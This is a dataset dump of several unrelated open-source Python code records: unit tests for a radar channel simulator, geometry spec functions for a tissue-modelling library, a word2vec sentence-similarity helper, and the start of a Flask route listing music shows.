test_velocity_setget(self) -> None:\n \"\"\"Velocity property getter should return setter argument\"\"\"\n \n expected_velocity = np.array([4, 5, 6])\n self.target.velocity = expected_velocity\n\n assert_array_almost_equal(expected_velocity, self.target.velocity)\n \n def test_get(self) -> None:\n \"\"\"Getting target parameters should return correct information\"\"\"\n \n self.assertEqual(1.234, self.target.get_cross_section(Direction(np.array([1, 0, 0])), Direction(np.array([1, 0, 0]))))\n assert_array_almost_equal(self.velocity, self.target.get_velocity())\n assert_array_almost_equal(self.target.forwards_transformation, self.target.get_forwards_transformation())\n assert_array_almost_equal(self.target.backwards_transformation, self.target.get_backwards_transformation())\n\n\nclass TestPhysicalRadarTarget(unittest.TestCase):\n \n def setUp(self) -> None:\n \n self.cross_section = FixedCrossSection(1.234)\n self.velocity = np.array([1, 2, 3], dtype=float)\n self.pose = Transformation.From_Translation(np.array([2, 3, 4]))\n self.moveable = Moveable(self.pose, self.velocity)\n\n self.target = PhysicalRadarTarget(self.cross_section, self.moveable)\n\n def test_init(self) -> None:\n \"\"\"Initialization paramters should be properly stored as class attributes\"\"\"\n\n self.assertIs(self.cross_section, self.target.cross_section)\n self.assertIs(self.moveable, self.target.moveable)\n\n def test_cross_section_setget(self) -> None:\n \"\"\"Cross section property getter should return setter argument\"\"\"\n \n expected_cross_section = FixedCrossSection(2.345)\n self.target.cross_section = expected_cross_section\n \n self.assertIs(expected_cross_section, self.target.cross_section)\n \n def test_get(self) -> None:\n \"\"\"Getting target parameters should return correct information\"\"\"\n \n self.assertEqual(1.234, self.target.get_cross_section(Direction(np.array([1, 0, 0])), Direction(np.array([1, 0, 0]))))\n assert_array_almost_equal(self.velocity, self.target.get_velocity())\n assert_array_almost_equal(self.moveable.forwards_transformation, self.target.get_forwards_transformation())\n assert_array_almost_equal(self.moveable.backwards_transformation, self.target.get_backwards_transformation())\n\n\nclass TestRadarChannelRealization(unittest.TestCase):\n \n def setUp(self) -> None:\n \n self.rng = default_rng(42)\n \n self.transmitter = SimulatedDevice(carrier_frequency=1e9)\n self.receiver = SimulatedDevice(carrier_frequency=1e9)\n self.channel = RadarChannelMock(transmitter=self.transmitter, receiver=self.receiver)\n self.gain = 1.234\n self.impulse_response = self.gain**.5 * self.rng.normal(size=(1, 1, 1, 1))\n \n self.realization = RadarChannelRealizationMock(self.channel, self.gain, self.impulse_response)\n\n def test_init_validation(self) -> None:\n \"\"\"Initializing should raise a ValueError o invalid arguments.\"\"\"\n \n with self.assertRaises(ValueError):\n _ = RadarChannelRealizationMock(self.channel, -1, self.impulse_response)\n \n\nclass TestRadarChannelBase(unittest.TestCase):\n \n def setUp(self) -> None:\n \n self.rng = default_rng(42)\n self.carrier_frequency = 1e9\n \n self.transmitter = SimulatedDevice(carrier_frequency=self.carrier_frequency, antennas=UniformArray(IdealAntenna, .01, (2, 1, 1)))\n self.receiver = SimulatedDevice(carrier_frequency=self.carrier_frequency, antennas=UniformArray(IdealAntenna, .01, (3, 1, 1)))\n self.channel = RadarChannelMock(self, transmitter=self.transmitter, receiver=self.receiver)\n \n def test_attenuate_setget(self) -> None:\n \"\"\"Attenuate property getter should return setter argument\"\"\"\n \n self.channel.attenuate = False\n self.assertFalse(self.channel.attenuate)\n \n def test_realize_target(self) -> None:\n \"\"\"Test subroutine to realize a radar target\"\"\"\n \n cross_section = FixedCrossSection(1.)\n veolicty = np.zeros(3, dtype=float)\n pose = Transformation.From_Translation(np.array([100., 0., 0.], dtype=float))\n target = VirtualRadarTarget(cross_section, veolicty, pose)\n \n realization = self.channel._realize_target(1e9, target)\n \n self.assertAlmostEqual(2 * 100 / speed_of_light, realization.delay)\n self.assertSequenceEqual((self.receiver.antennas.num_receive_antennas, self.transmitter.antennas.num_transmit_antennas), realization.mimo_response.shape)\n\n def test_realize_target_validation(self) -> None:\n \"\"\"Target realization subroutine should raise errors on invalid parameter combinations\"\"\"\n \n cross_section = FixedCrossSection(1.)\n veolicty = np.zeros(3, dtype=float)\n pose = Transformation.From_Translation(np.array([100., 0., 0.], dtype=float))\n target = VirtualRadarTarget(cross_section, veolicty, pose)\n \n with self.assertRaises(ValueError):\n _ = self.channel._realize_target(0, target)\n \n with self.assertRaises(ValueError):\n _ = self.channel._realize_target(-1, target)\n \n target.position = self.transmitter.global_position\n with self.assertRaises(RuntimeError):\n _ = self.channel._realize_target(1, target)\n \n self.receiver.position = np.array([1, 2, 3])\n target.position = self.receiver.global_position\n with self.assertRaises(RuntimeError):\n _ = self.channel._realize_target(1, target)\n \n self.channel.transmitter = None\n with self.assertRaises(FloatingError):\n _ = self.channel._realize_target(1, target)\n \n def test_null_hypothesis_validation(self) -> None:\n \"\"\"Null hypothesis realization should raise RuntimeError on invalid internal state\"\"\"\n \n with self.assertRaises(RuntimeError):\n self.channel.null_hypothesis(1, 1)\n \n def test_null_hypothesis(self) -> None:\n \"\"\"The radar channel null hypothesis routine should create a valid null hypothesis\"\"\"\n \n signal = Signal(self.rng.normal(size=(self.transmitter.antennas.num_transmit_antennas, 10)), self.transmitter.sampling_rate, self.transmitter.carrier_frequency)\n _ = self.channel.propagate(signal)\n \n null_hypothesis = self.channel.null_hypothesis(10, self.transmitter.sampling_rate)\n self.assertEqual(self.transmitter.antennas.num_transmit_antennas, null_hypothesis.num_transmit_streams)\n self.assertEqual(self.receiver.antennas.num_receive_antennas, null_hypothesis.num_receive_streams)\n self.assertEqual(10, null_hypothesis.num_samples)\n\n\nclass TestRadarPathRealization(unittest.TestCase):\n \"\"\"Test the radar path realization class\"\"\"\n \n def setUp(self) -> None:\n \n self.phase_shift = 1.\n self.delay = 2.\n self.doppler_shift = 3.\n self.doppler_velocity = 312.\n self.power_factor = 4.\n self.mimo_response = np.array([[[1, 2], [3, 4]]])\n self.global_position = np.array([1, 2, 3])\n self.global_velocity = np.array([0, 0, 312])\n self.static = True\n self.realization = RadarPathRealization(self.phase_shift, self.delay, self.doppler_shift, self.doppler_velocity, self.power_factor, self.mimo_response, self.global_position, self.global_velocity, self.static)\n \n def test_properties(self) -> None:\n \"\"\"Class properties should return initialization arguments\"\"\"\n \n self.assertEqual(self.phase_shift, self.realization.phase_shift)\n self.assertEqual(self.delay, self.realization.delay)\n self.assertEqual(self.doppler_shift, self.realization.doppler_shift)\n self.assertEqual(self.doppler_velocity, self.realization.doppler_velocity)\n self.assertEqual(self.power_factor, self.realization.power_factor)\n assert_array_equal(self.mimo_response, self.realization.mimo_response)\n assert_array_equal(self.global_position, self.realization.global_position)\n assert_array_equal(self.global_velocity, self.realization.global_velocity)\n self.assertEqual(self.static, self.realization.static)\n\n\nclass TestSingleTargetRadarChannelRealization(unittest.TestCase):\n \"\"\"Test the single target radar channel realization class\"\"\"\n \n def setUp(self) -> None:\n \n self.device = SimulatedDevice(carrier_frequency=1e9, antennas=UniformArray(IdealAntenna, .01, (2, 1, 1)))\n self.channel = SingleTargetRadarChannel(1., 1.)\n self.channel.transmitter = self.device\n self.channel.receiver = self.device\n \n self.gain = 2.\n self.target_realization = RadarTargetRealization(1., 2., 3., 4., 5., np.array([[1, 2], [3, 4]]), np.array([1, 2, 3]), np.array([0, 0, 4.]))\n self.num_samples = 10\n self.sampling_rate = 1.234\n \n self.realization = SingleTargetRadarChannelRealization(self.channel, self.gain, self.target_realization, self.num_samples, self.sampling_rate)\n\n def test_properties(self) -> None:\n \"\"\"Class properties should return initialization arguments\"\"\"\n \n self.assertEqual(self.gain, self.realization.gain)\n self.assertIs(self.target_realization, self.realization.target_realization)\n\n def test_null_hypothesis(self) -> None:\n \"\"\"Null hypothesis realization should generate correct channel realization\"\"\"\n \n null_realization = self.realization.null_hypothesis(10, 1e8)\n \n self.assertIsInstance(null_realization, SingleTargetRadarChannelRealization)\n\n def test_ground_trutch(self) -> None:\n \"\"\"Ground truth should return correct information\"\"\"\n \n assert_array_equal(np.array([[1, 2, 3]]), self.realization.ground_truth())\n\n\nclass TestMultiTargetRadarChannelRealization(unittest.TestCase):\n \"\"\"Test the multi target radar channel realization class\"\"\"\n \n def setUp(self) -> None:\n \n self.device = SimulatedDevice(carrier_frequency=1e9, antennas=UniformArray(IdealAntenna, .01, (2, 1, 1)))\n self.channel = SingleTargetRadarChannel(1., 1.)\n self.channel.transmitter = self.device\n self.channel.receiver = self.device\n \n self.gain = 2.\n self.target_realization = RadarTargetRealization(1., 2., 3., 4., 5., np.array([[1, 2], [3, 4]]), np.array([0, 1, 2]), np.array([1, 2, 3]))\n self.interference_realization = RadarInterferenceRealization(1., 2., 3., 4., 5., np.array([[2, 5], [1, 3]]), np.array([0, 1, 2]), np.array([4, 5, 6]))\n self.num_samples = 10\n self.sampling_rate = 1.234\n \n self.realization = MultiTargetRadarChannelRealization(self.channel, self.gain, self.interference_realization, [self.target_realization], self.num_samples, self.sampling_rate)\n\n def test_properties(self) -> None:\n \"\"\"Class properties should return initialization arguments\"\"\"\n \n self.assertEqual(self.gain, self.realization.gain)\n self.assertIs(self.interference_realization, self.realization.interference_realization)\n self.assertSequenceEqual([self.target_realization], self.realization.target_realizations)\n\n def test_null_hypothesis(self) -> None:\n \"\"\"Null hypothesis realization should generate correct channel realization\"\"\"\n \n null_realization = self.realization.null_hypothesis(self.num_samples, self.sampling_rate)\n \n self.assertIsInstance(null_realization, MultiTargetRadarChannelRealization)\n \n def test_ground_trutch(self) -> None:\n \"\"\"Ground truth should return correct information\"\"\"\n \n assert_array_equal(np.array([[0, 1, 2]]), self.realization.ground_truth())\n\n\nclass TestMultiTargetRadarChannel(unittest.TestCase):\n \n def setUp(self) -> None:\n \n self.carrier_frequency = 1e9\n self.transmitter = SimulatedDevice(carrier_frequency=self.carrier_frequency, pose=Transformation.From_Translation(np.array([0, 0, 0], dtype=float)))\n self.receiver = SimulatedDevice(carrier_frequency=self.carrier_frequency, pose=Transformation.From_Translation(np.array([20, 0, 0], dtype=float)))\n \n self.first_target = VirtualRadarTarget(FixedCrossSection(1.), velocity=np.array([10, 0, 0]), pose=Transformation.From_Translation(np.array([-10, 0, 0], dtype=float)))\n self.second_target = VirtualRadarTarget(FixedCrossSection(1.), velocity=np.array([-10, 0, 0]), pose=Transformation.From_Translation(np.array([10, 0, 0], dtype=float)))\n self.channel = MultiTargetRadarChannel(transmitter=self.transmitter, receiver=self.receiver)\n self.channel.add_target(self.first_target)\n self.channel.add_target(self.second_target)\n\n def test_add_virtual_target(self) -> None:\n \"\"\"Test adding a new virtual radar target to the channel\"\"\"\n \n target = VirtualRadarTarget(FixedCrossSection(1.))\n self.channel.add_target(target)\n \n self.assertTrue(target in self.channel.targets)\n \n def test_add_physical_target(self) -> None:\n \"\"\"Test adding a new physical radar target to the channel\"\"\"\n \n target = PhysicalRadarTarget(FixedCrossSection(1.), SimulatedDevice())\n self.channel.add_target(target)\n \n self.assertTrue(target in self.channel.targets)\n\n def test_make_target(self) -> None:\n \"\"\"Test declaring a moveable as a radar target\"\"\"\n \n moveable = Moveable()\n crosse_section = FixedCrossSection(1.1234)\n new_target = self.channel.make_target(moveable, crosse_section)\n \n self.assertCountEqual([self.first_target, self.second_target, new_target], self.channel.targets)\n \n def test_realize_interference_validation(self) -> None:\n \"\"\"Interference realization subroutine should raise errors on invalid parameters and states\"\"\"\n \n with self.assertRaises(ValueError):\n self.channel._realize_interference(0.)\n \n with self.assertRaises(FloatingError):\n MultiTargetRadarChannel()._realize_interference(1.2345)\n \n self.transmitter.pose.translation = np.zeros(3)\n self.receiver.pose.translation = np.zeros(3)\n \n with self.assertRaises(RuntimeError):\n self.channel._realize_interference(1.234)\n \n def test_realize_interference_monostatic(self) -> None:\n \"\"\"Realization should not realize self-interference\"\"\"\n \n self.channel.receiver = self.channel.transmitter\n self.assertIsNone(self.channel._realize_interference(1.234))\n \n def test_realize_validation(self) -> None:\n \"\"\"Realization should raise FloatingError if devices aren't specified\"\"\"\n \n with self.assertRaises(FloatingError):\n MultiTargetRadarChannel().realize(1, 1.)\n\n def test_siso_realize(self) -> None:\n \"\"\"Test SISO channel realization\"\"\"\n \n realization = self.channel.realize(200, 1e8)\n \n self.assertEqual(2, len(realization.target_realizations))\n \n self.assertEqual(1, realization.num_receive_streams)\n self.assertEqual(1, realization.num_transmit_streams)\n self.assertEqual(200, realization.num_samples)\n \n def test_mimo_realize(self) -> None:\n \"\"\"Test MIMO channel realization\"\"\"\n \n antenna_spacing = .5 * self.transmitter.wavelength\n self.transmitter.antennas = UniformArray(IdealAntenna, antenna_spacing, (2, 2, 1))\n self.receiver.antennas = UniformArray(IdealAntenna, antenna_spacing, (2, 2, 1))\n \n realization = self.channel.realize(200, 1e8)\n \n self.assertEqual(2, len(realization.target_realizations))\n \n self.assertEqual(4, realization.num_receive_streams)\n self.assertEqual(4, realization.num_transmit_streams)\n self.assertEqual(200, realization.num_samples)\n\n def test_null_hypothesis(self) -> None:\n \"\"\"Test the null hypthesis realization routine\"\"\"\n \n num_samples = 200\n sampling_rate = 1e8\n one_hypothesis = self.channel.realize(num_samples, sampling_rate)\n null_hypothesis = self.channel.null_hypothesis(num_samples, sampling_rate, one_hypothesis)\n \n self.assertEqual(1, null_hypothesis.num_receive_streams)\n self.assertEqual(1, null_hypothesis.num_transmit_streams)\n self.assertEqual(200, null_hypothesis.num_samples)\n self.assertEqual(0, len(null_hypothesis.target_realizations))\n self.assertAlmostEqual(0., float(np.linalg.norm(null_hypothesis.state)))\n \n def test_null_hypothesis_static(self) -> None:\n \"\"\"Test the null hypthoseis realization routine including a static target\"\"\"\n \n static_target = VirtualRadarTarget(FixedCrossSection(1.), pose=Transformation.From_Translation(np.array([10, 10, 10])), static=True)\n self.channel.add_target(static_target)\n \n num_samples = 200\n sampling_rate = 1e8\n one_hypothesis = self.channel.realize(num_samples, sampling_rate)\n null_hypothesis = self.channel.null_hypothesis(num_samples, sampling_rate, one_hypothesis)\n \n self.assertEqual(1, null_hypothesis.num_receive_streams)\n self.assertEqual(1, null_hypothesis.num_transmit_streams)\n self.assertEqual(num_samples, null_hypothesis.num_samples)\n self.assertEqual(1, len(null_hypothesis.target_realizations))\n self.assertLess(0., float(np.linalg.norm(null_hypothesis.state)))\n \n def test_serialization(self) -> None:\n \"\"\"Test YAML serialization\"\"\"\n \n with patch('hermespy.channel.Channel.transmitter', new_callable=PropertyMock) as transmitter_mock, \\\n patch('hermespy.channel.Channel.receiver', new_callable=PropertyMock) as receiver_mock, \\\n patch('hermespy.channel.Channel.random_mother', new_callable=PropertyMock) as random_mock:\n \n transmitter_mock.return_value = None\n receiver_mock.return_value = None\n random_mock.return_value = None\n \n test_yaml_roundtrip_serialization(self, self.channel)\n\n\nclass TestSingleTargetRadarChannel(unittest.TestCase):\n\n def setUp(self) -> None:\n\n self.range = 100.\n self.radar_cross_section = 1.\n\n self.random_generator = default_rng(42)\n self.random_node = Mock()\n self.random_node._rng = self.random_generator\n\n self.transmitter = SimulatedDevice(carrier_frequency=1e9, sampling_rate=1e6)\n self.receiver = self.transmitter\n\n self.target_exists = True\n self.channel = SingleTargetRadarChannel(self.range, self.radar_cross_section,\n transmitter=self.transmitter,\n receiver=self.receiver,\n target_exists=self.target_exists)\n self.channel.random_mother = self.random_node\n\n self.expected_delay = 2 * self.range / speed_of_light\n\n def test_init(self) -> None:\n \"\"\"The object initialization should properly store all parameters\"\"\"\n\n self.assertEqual(self.range, self.channel.target_range)\n self.assertIs(self.radar_cross_section, self.channel.radar_cross_section)\n self.assertIs(self.transmitter, self.channel.transmitter)\n self.assertIs(self.receiver, self.channel.receiver)\n self.assertIs(self.target_exists, self.channel.target_exists)\n\n def test_target_range_setget(self) -> None:\n \"\"\"Target range property getter should return setter argument\"\"\"\n\n new_range = 500\n self.channel.target_range = new_range\n\n self.assertEqual(new_range, self.channel.target_range)\n\n def test_target_range_validation(self) -> None:\n \"\"\"Target range property setter should raise ValueError on invalid arguments\"\"\"\n\n with self.assertRaises(ValueError):\n self.channel.target_range = -1.\n \n with self.assertRaises(ValueError):\n self.channel.target_range = (1, 2, 3)\n \n with self.assertRaises(ValueError):\n self.channel.target_range = (3, 2)\n \n with self.assertRaises(ValueError):\n self.channel.target_range = (-1, 0)\n \n with self.assertRaises(ValueError):\n self.channel.target_range = 'wrong argument type'\n\n def test_target_exists_setget(self) -> None:\n \"\"\"Target exists flag getter should return setter argument\"\"\"\n\n new_target_exists = False\n self.channel.target_exists = new_target_exists\n self.assertEqual(new_target_exists, self.channel.target_exists)\n\n def test_radar_cross_section_get(self) -> None:\n \"\"\"Radar cross section getter should return init param\"\"\"\n\n self.assertEqual(self.radar_cross_section, self.channel.radar_cross_section)\n\n def test_cross_section_validation(self) -> None:\n \"\"\"Radar cross section property should raise ValueError on arguments smaller than zero\"\"\"\n\n with self.assertRaises(ValueError):\n self.channel.radar_cross_section = -1.12345\n\n try:\n self.channel.radar_cross_section = 0.\n\n except ValueError:\n self.fail()\n\n def test_velocity_setget(self) -> None:\n \"\"\"Velocity getter should return setter argument\"\"\"\n\n new_velocity = 20\n\n self.channel.target_velocity = new_velocity\n self.assertEqual(new_velocity, self.channel.target_velocity)\n\n def test_realize_anchored_validation(self) -> None:\n \"\"\"Impulse response should raise FloatingError if not anchored to a device\"\"\"\n\n with patch.object(RadarChannelBase, 'transmitter', None), self.assertRaises(FloatingError):\n _ = self.channel.realize(0, 1.)\n\n def test_realize_carrier_frequency_validation(self) -> None:\n \"\"\"Impulse response should raise RuntimeError if device carrier frequencies are smaller or equal to zero\"\"\"\n\n self.transmitter.carrier_frequency = 0.\n\n with self.assertRaises(ValueError):\n _ = self.channel.realize(0, 1.)\n\n def test_realize_interference_validation(self) -> None:\n \"\"\"Impulse response should raise RuntimeError if not configured as a self-interference channel\"\"\"\n\n with patch.object(SingleTargetRadarChannel, 'receiver', None), self.assertRaises(RuntimeError):\n _ = self.channel.realize(0, 1.)\n\n def _create_impulse_train(self, interval_in_samples: int, number_of_pulses: int):\n\n interval = interval_in_samples / self.transmitter.sampling_rate\n\n number_of_samples = int(np.ceil(interval * self.transmitter.sampling_rate * number_of_pulses))\n output_signal = np.zeros((1, number_of_samples), dtype=complex)\n\n interval_in_samples = int(np.around(interval * self.transmitter.sampling_rate))\n\n output_signal[:, :number_of_samples:interval_in_samples] = 1.0\n\n return output_signal\n\n def test_propagation_delay_integer_num_samples(self) -> None:\n \"\"\"\n Test if the received signal corresponds to the expected delayed version, given that the delay is a multiple\n of the sampling interval\n \"\"\"\n\n samples_per_symbol = 1000\n num_pulses = 10\n delay_in_samples = 507\n\n input_signal = self._create_impulse_train(samples_per_symbol, num_pulses)\n\n expected_range = speed_of_light * delay_in_samples / self.transmitter.sampling_rate / 2\n expected_amplitude = ((speed_of_light / self.transmitter.carrier_frequency) ** 2 *\n self.radar_cross_section / (4 * pi) ** 3 / expected_range ** 4)\n\n self.channel.target_range = expected_range\n\n output, _, _ = self.channel.propagate(Signal(input_signal, self.transmitter.sampling_rate))\n\n expected_output = np.hstack((np.zeros((1, delay_in_samples)), input_signal)) * expected_amplitude\n assert_array_almost_equal(abs(expected_output), np.abs(output[0].samples[:, :expected_output.size]))\n\n def test_propagation_delay_noninteger_num_samples(self) -> None:\n \"\"\"\n Test if the received signal corresponds to the expected delayed version, given that the delay falls in the\n middle of two sampling instants.\n \"\"\"\n samples_per_symbol = 800\n num_pulses = 20\n delay_in_samples = 312\n\n input_signal = self._create_impulse_train(samples_per_symbol, num_pulses)\n\n expected_range = speed_of_light * (delay_in_samples + .5) / self.transmitter.sampling_rate / 2\n expected_amplitude = ((speed_of_light / self.transmitter.carrier_frequency) ** 2 *\n self.radar_cross_section / (4 * pi) ** 3 / expected_range ** 4)\n\n self.channel.target_range = expected_range\n\n output, _, _ = self.channel.propagate(Signal(input_signal, self.transmitter.sampling_rate))\n\n straddle_loss = np.sinc(.5)\n peaks = np.abs(output[0].samples[:, delay_in_samples:input_signal.size:samples_per_symbol])\n\n assert_array_almost_equal(peaks, expected_amplitude * straddle_loss * np.ones(peaks.shape))\n\n def test_propagation_delay_doppler(self) -> None:\n \"\"\"\n Test if the received signal corresponds to a frequency-shifted version of the transmitted signal with the\n expected Doppler shift\n \"\"\"\n\n samples_per_symbol = 50\n num_pulses = 100\n initial_delay_in_samples = 1000\n expected_range = speed_of_light * initial_delay_in_samples / self.transmitter.sampling_rate / 2\n velocity = 10\n expected_amplitude = ((speed_of_light / self.transmitter.carrier_frequency) ** 2 *\n self.radar_cross_section / (4 * pi) ** 3 / expected_range ** 4)\n\n initial_delay = initial_delay_in_samples / self.transmitter.sampling_rate\n\n timestamps_impulses = np.arange(num_pulses) * samples_per_symbol / self.transmitter.sampling_rate\n traveled_distances = velocity * timestamps_impulses\n delays = initial_delay + 2 * traveled_distances / speed_of_light\n expected_peaks = timestamps_impulses + delays\n peaks_in_samples = np.around(expected_peaks * self.transmitter.sampling_rate).astype(int)\n straddle_delay = expected_peaks - peaks_in_samples / self.transmitter.sampling_rate\n relative_straddle_delay = straddle_delay * self.transmitter.sampling_rate\n expected_straddle_amplitude = np.sinc(relative_straddle_delay) * expected_amplitude\n\n input_signal = self._create_impulse_train(samples_per_symbol, num_pulses)\n\n self.channel.target_range = expected_range\n self.channel.velocity = velocity\n\n output, _, _ = self.channel.propagate(Signal(input_signal, self.transmitter.sampling_rate))\n\n assert_array_almost_equal(np.abs(output[0].samples[0, peaks_in_samples].flatten()), expected_straddle_amplitude)\n\n def test_doppler_shift(self) -> None:\n \"\"\"\n Test if the received signal corresponds to the expected delayed version, given time variant delays on account of\n movement\n \"\"\"\n\n velocity = 100\n self.channel.target_velocity = velocity\n\n num_samples = 100000\n sinewave_frequency = .25 * self.transmitter.sampling_rate\n doppler_shift = 2 * velocity / speed_of_light * self.transmitter.carrier_frequency\n\n time = np.arange(num_samples) / self.transmitter.sampling_rate\n\n input_signal = np.sin(2 * np.pi * sinewave_frequency * time)\n output, _, _ = self.channel.propagate(Signal(input_signal[np.newaxis, :], self.transmitter.sampling_rate))\n\n input_freq = np.fft.fft(input_signal)\n output_freq = np.fft.fft(output[0].samples.flatten()[-num_samples:])\n\n freq_resolution = self.transmitter.sampling_rate / num_samples\n\n freq_in = np.argmax(np.abs(input_freq[:int(num_samples/2)])) * freq_resolution\n freq_out = np.argmax(np.abs(output_freq[:int(num_samples/2)])) * freq_resolution\n\n self.assertAlmostEqual(freq_out - freq_in, doppler_shift, delta=np.abs(doppler_shift)*.01)\n\n def test_no_echo(self) -> None:\n \"\"\"Test if no echos are observed if target_exists flag is disabled\"\"\"\n \n samples_per_symbol = 500\n num_pulses = 15\n\n input_signal = self._create_impulse_train(samples_per_symbol, num_pulses)\n\n self.channel.target_exists = False\n output, _, _ = self.channel.propagate(Signal(input_signal, self.transmitter.sampling_rate))\n\n assert_array_almost_equal(output[0].samples, np.zeros(output[0].samples.shape))\n\n def test_no_attenuation(self) -> None:\n \"\"\"Make sure the signal energy is preserved when the attenuate flag is disabled\"\"\"\n\n self.channel.attenuate = False\n self.channel.target_range = 10.\n\n input_signal = Signal(self._create_impulse_train(500, 15), self.transmitter.sampling_rate)\n output, _, _ = self.channel.propagate(input_signal)\n\n assert_array_almost_equal(input_signal.energy, output[0].energy, 1)\n\n def test_serialization(self) -> None:\n \"\"\"Test YAML serialization\"\"\"\n \n with patch('hermespy.channel.Channel.transmitter', new_callable=PropertyMock) as transmitter_mock, \\\n patch('hermespy.channel.Channel.receiver', new_callable=PropertyMock) as receiver_mock, \\\n patch('hermespy.channel.Channel.random_mother', new_callable=PropertyMock) as random_mock:\n \n transmitter_mock.return_value = None\n receiver_mock.return_value = None\n random_mock.return_value = None\n \n test_yaml_roundtrip_serialization(self, self.channel)\n","repo_name":"Barkhausen-Institut/hermespy","sub_path":"tests/unit_tests/channel/test_radar_channel.py","file_name":"test_radar_channel.py","file_ext":"py","file_size_in_byte":34977,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"61"} +{"seq_id":"23835685338","text":"def planar_sheet():\n \"\"\"\n Specification for a 2D sheet in the plane\n \"\"\"\n spec = {\n \"edge\": {\n \"trgt\": 0,\n \"nz\": 1.0,\n \"length\": 1.0,\n \"face\": 0,\n \"srce\": 0,\n \"dx\": 0.0,\n \"dy\": 0.0,\n \"sx\": 0.0,\n \"sy\": 0.0,\n \"tx\": 0.0,\n \"ty\": 0.0,\n \"fx\": 0.0,\n \"fy\": 0.0,\n },\n \"vert\": {\"y\": 0.0, \"is_active\": 1, \"x\": 0.0},\n \"face\": {\n \"y\": 0.0,\n \"is_alive\": 1,\n \"perimeter\": 0.0,\n \"area\": 0.0,\n \"x\": 0.0,\n \"num_sides\": 6,\n \"id\": 0,\n },\n \"settings\": {\"geometry\": \"planar\"},\n }\n return spec\n\n\ndef planar_spec():\n return planar_sheet()\n\n\ndef planar_periodic_sheet():\n spec = planar_sheet()\n spec[\"settings\"] = {\"boundaries\": {\"x\": [-1, 1], \"y\": [-1, 1]}}\n return spec\n\n\ndef sheet_spec():\n\n spec = {\n \"face\": {\n \"x\": 0.0,\n \"y\": 0.0,\n \"z\": 0.0,\n \"num_sides\": 6,\n \"area\": 1.0,\n \"perimeter\": 1.0,\n \"is_alive\": 1,\n \"id\": 0,\n },\n \"vert\": {\n \"x\": 0.0,\n \"y\": 0.0,\n \"z\": 0.0,\n \"is_active\": 1,\n \"rho\": 0.0,\n \"height\": 0.0,\n \"basal_shift\": 4.0,\n },\n \"edge\": {\n \"srce\": 0,\n \"trgt\": 0,\n \"face\": 0,\n \"dx\": 0.0,\n \"dy\": 0.0,\n \"dz\": 0.0,\n \"nx\": 0.0,\n \"ny\": 0.0,\n \"nz\": 1.0,\n \"sx\": 0.0,\n \"sy\": 0.0,\n \"sz\": 0.0,\n \"tx\": 0.0,\n \"ty\": 0.0,\n \"tz\": 0.0,\n \"fx\": 0.0,\n \"fy\": 0.0,\n \"fz\": 0.0,\n \"length\": 1.0,\n \"is_active\": 1,\n },\n \"settings\": {\"geometry\": \"cylindrical\", \"height_axis\": \"z\"},\n }\n return spec\n\n\ndef periodic_sheet():\n spec = planar_sheet()\n spec[\"settings\"].update({\"boundaries\": {\"x\": [-1, 1], \"y\": [-1, 1]}})\n return spec\n\n\ndef cylindrical_sheet():\n \"\"\"Geometry specification of a sheet in a 3D space.\"\"\"\n spec = sheet_spec()\n return spec\n\n\ndef rod_sheet():\n \"\"\"Geomtetry specs of a rod sheet in 3D space.\"\"\"\n spec = sheet_spec()\n spec[\"settings\"].update({\"geometry\": \"rod\", \"height_axis\": \"z\", \"ab\": [0.0, 0.0]})\n spec[\"vert\"].update({\"left_tip\": False, \"right_tip\": False})\n\n return spec\n\n\ndef flat_sheet():\n \"\"\"Geometry specification of a sheet in a 3D space.\"\"\"\n spec = sheet_spec()\n spec[\"settings\"].update({\"geometry\": \"flat\"})\n return spec\n\n\ndef spherical_sheet():\n \"\"\"Geometry specification of a sheet in a 3D space.\n\n Height is computed with respect to the distance to\n the coordinate systems center\n\n \"\"\"\n\n spec = sheet_spec()\n spec[\"settings\"].update({\"geometry\": \"spherical\"})\n return spec\n\n\ndef bulk_spec():\n \"\"\"Geometry specification for bulk tissues.\"\"\"\n spec = sheet_spec()\n\n spec[\"edge\"].update({\"cx\": 0.0, \"cy\": 0.0, \"cz\": 0.0, \"cell\": 0, \"sub_vol\": 0.0})\n\n spec[\"cell\"] = {\n \"x\": 0.0,\n \"y\": 0.0,\n \"z\": 0.0,\n \"area\": 0.0,\n \"vol\": 0.0,\n \"num_faces\": 6,\n \"is_alive\": 1,\n \"id\": 0,\n }\n return spec\n","repo_name":"DamCB/tyssue","sub_path":"tyssue/config/geometry/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"61"} +{"seq_id":"12081192465","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\nfrom gensim.models import word2vec\nimport jieba\nimport numpy as np\nfrom scipy.linalg import norm\n\nclass voiceModel():\n def __init__(self):\n self.model = word2vec.Word2Vec.load('voice.model')\n\n def sentence_vector(self, s):\n words = jieba.lcut(s)\n v = np.zeros(100)\n wordLen = len(words)\n for word in words:\n try:\n temInt = self.model.wv[word]\n except Exception as e:\n wordLen -=1\n else:\n v += temInt\n v /= wordLen\n return v\n\n def vector_similarity(self, s1, s2):\n v1, v2 = self.sentence_vector(s1), self.sentence_vector(s2)\n return np.dot(v1, v2) / (norm(v1) * norm(v2))\nif __name__ == \"__main__\":\n mvoiceModel = voiceModel()\n senten1 = \"我要关闭\"\n senten2 = \"我要部署\"\n print(mvoiceModel.vector_similarity(senten1,senten2))\n","repo_name":"Wang-future/private_project","sub_path":"codeAdoc/code/audio/mVoiceModel.py","file_name":"mVoiceModel.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2997323333","text":"from flask import (\n Blueprint,\n render_template,\n flash,\n redirect,\n url_for\n)\nfrom model import Artist, db, Show, Venue\nimport sys\nfrom forms import *\nfrom model import Artist, Venue\n\nshow_blueprint = Blueprint('show_blueprint', __name__)\n\n\n# Shows\n# ----------------------------------------------------------------\n\n@show_blueprint.route('/shows')\ndef shows():\n # displays list of shows at /shows\n try:\n data = []\n\n stmt = db.session.query(Show, Venue, Artist).select_from(\n Show).join(Venue).join(Artist).all()\n\n for show, venue, artist in stmt:\n data.append({\n \"venue_id\": venue.id,\n \"venue_name\": venue.name,\n \"artist_id\": artist.id,\n \"artist_name\": artist.name,\n \"artist_image_link\": artist.image_link,\n \"start_time\": show.start_time\n })\n\n except BaseException:\n flash(f'An error occured, could not get all shows successfully!')\n print(sys.exc_info())\n\n return render_template('pages/shows.html', 